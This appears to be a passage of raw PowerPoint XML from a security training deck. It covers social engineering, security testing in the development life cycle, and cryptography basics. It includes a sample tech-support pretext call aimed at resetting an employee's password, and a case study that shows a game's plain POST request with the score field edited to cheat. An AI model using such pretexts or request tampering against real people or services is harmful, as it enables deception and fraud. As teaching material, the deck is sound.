                        <a14:foregroundMark x1="19200" y1="39406" x2="19200" y2="39406"/>
                        <a14:foregroundMark x1="24400" y1="38020" x2="24400" y2="38020"/>
                        <a14:foregroundMark x1="15200" y1="36832" x2="15200" y2="36832"/>
                        <a14:foregroundMark x1="15800" y1="19208" x2="15800" y2="19208"/>
                        <a14:foregroundMark x1="53200" y1="50099" x2="53200" y2="50099"/>
                        <a14:foregroundMark x1="40400" y1="48911" x2="40400" y2="48911"/>
                        <a14:foregroundMark x1="45600" y1="46139" x2="45600" y2="46139"/>
                        <a14:foregroundMark x1="32200" y1="49109" x2="32200" y2="49109"/>
                        <a14:foregroundMark x1="61800" y1="45347" x2="61800" y2="45347"/>
                        <a14:foregroundMark x1="80800" y1="49703" x2="80800" y2="49703"/>
                        <a14:foregroundMark x1="70600" y1="36436" x2="70600" y2="36436"/>
                        <a14:foregroundMark x1="67400" y1="27327" x2="65000" y2="28317"/>
                        <a14:foregroundMark x1="59800" y1="32277" x2="59800" y2="32277"/>
                        <a14:foregroundMark x1="39400" y1="36436" x2="39400" y2="36436"/>
                        <a14:foregroundMark x1="42000" y1="32871" x2="42000" y2="32871"/>
                        <a14:foregroundMark x1="45600" y1="21782" x2="45600" y2="21782"/>
                        <a14:foregroundMark x1="32200" y1="20000" x2="32200" y2="20000"/>
                        <a14:foregroundMark x1="26000" y1="16040" x2="26000" y2="16040"/>
                        <a14:foregroundMark x1="30000" y1="44950" x2="30000" y2="44950"/>
                        <a14:foregroundMark x1="29600" y1="31881" x2="29600" y2="31881"/>
                        <a14:foregroundMark x1="30600" y1="37426" x2="30600" y2="37426"/>
                        <a14:foregroundMark x1="30600" y1="37426" x2="38800" y2="37426"/>
                        <a14:foregroundMark x1="53000" y1="38812" x2="54600" y2="38812"/>
                        <a14:foregroundMark x1="56200" y1="39406" x2="60400" y2="40792"/>
                        <a14:foregroundMark x1="61200" y1="40792" x2="61200" y2="40792"/>
                        <a14:foregroundMark x1="70000" y1="42376" x2="74200" y2="42376"/>
                        <a14:foregroundMark x1="57200" y1="45941" x2="57200" y2="45941"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2675382"/>
            <a:ext cx="3924300" cy="3963543"/>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04800" y="2819400"/>
            <a:ext cx="4495800" cy="4324261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>“Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>? Who is this? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> Tech </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>support? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> Oh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>, I’m sorry. I’m trying to reach Terry Simpson at extension 24667. Can you transfer me, please? I’m in a hurry.” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>… “Hi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Terry, this is Jim from Tech Support. You can verify my identity from the caller-ID. Yes, I need to reset your password…” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3302772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Reverse Social Engineering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A final, more advanced method of gaining illicit information is known as “reverse social engineering”. This is when the hacker creates a persona that appears to be in a position of authority so that employees will ask him for information, rather than the other way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>around</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Includes three phases: sabotage, advertising, assisting</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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242"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6324600" y="5093854"/>
            <a:ext cx="1943100" cy="1943100"/>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2254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19200"/>
            <a:ext cx="7924800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315"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143000" y="2209800"/>
            <a:ext cx="6858000" cy="438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5207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sz="3800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Testing in the Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Development Life Cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software security testing includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>abuse/misuse cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>isting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>normative security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>requirements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>erforming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>architectural </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>risk analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Building </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>risk-based security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>test plans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ielding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>static analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>erforming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ﬁnal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cleaning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>after security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>breaches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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36451956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 Won an Online Game</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Magstudio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.magstudio.bg/bg/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>had created an online game for one of their customers – Petrol AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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601372" y="2819400"/>
            <a:ext cx="5809203" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4"/>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219200" y="3505200"/>
            <a:ext cx="2426533" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2053" name="Picture 5"/>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57200" y="4495800"/>
            <a:ext cx="2446586" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38440243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 Won an Online Game</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>At the end of the game, the collected player’s points were submitted directly as a POST query, without any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0"/>
              <a:t>POST /path/script.cgi HTTP/1.0 From: game@petrol.com User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>HTTPTool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/1.0 Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0"/>
              <a:t> Content-Length: 33 name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>Peter&amp;surname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>Sabev&amp;score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0"/>
              <a:t>=10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Changed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Length: 36 name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Peter&amp;surname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sabev&amp;score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=31820</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000"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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3007140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Cryptography?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Cryptography?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The practice and study of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>hiding information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is considered as a branch of both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mathematics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Computer Science</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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338"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352800" y="3810000"/>
            <a:ext cx="2438400" cy="2438400"/>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505188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Cryptographic Elements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptography has three main elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: is the process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of transforming information (referred to as plaintext) using an algorithm (called a cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A value that works with a cryptographic algorithm to produce a specific cipher text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123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17163888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Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Based on the type of key used, Cryptography is categorized into:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Symmetric key Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Asymmetric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>key </a:t>
